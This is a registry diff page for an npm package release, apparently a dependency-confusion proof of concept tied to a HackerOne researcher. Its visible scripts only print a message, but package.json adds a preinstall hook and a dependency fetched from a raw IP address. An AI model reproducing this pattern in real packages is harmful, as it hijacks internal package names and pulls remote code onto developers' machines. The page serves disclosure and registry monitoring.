@dailyapy-rn/rn-push-provisioning 101.101.101

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of @dailyapy-rn/rn-push-provisioning might be problematic. Click here for more details.

package/index.js ADDED
@@ -0,0 +1 @@
1
+ console.log("Test package installed by hackerone.com/thruster")
package/package.json ADDED
@@ -0,0 +1,16 @@
1
+ {
2
+ "name": "@dailyapy-rn/rn-push-provisioning",
3
+ "version": "101.101.101",
4
+ "type": "module",
5
+ "description": "# To use this template:",
6
+ "main": "index.js",
7
+ "scripts": {
8
+ "test": "echo \"Error: no test specified\" && exit 1",
9
+ "preinstall": "node preinstall.js"
10
+ },
11
+ "dependencies": {
12
+ "dailyapy-rn-rn-push-provisioning-poc": "http://142.93.186.220:8081/repository/thruster-pocs/dailyapy-rn-rn-push-provisioning-poc/-/dailyapy-rn-rn-push-provisioning-poc-99.99.99.tgz"
13
+ },
14
+ "author": "",
15
+ "license": "ISC"
16
+ }
package/preinstall.js ADDED
@@ -0,0 +1 @@
1
+ console.log("test package installed by hackerone.com/thruster")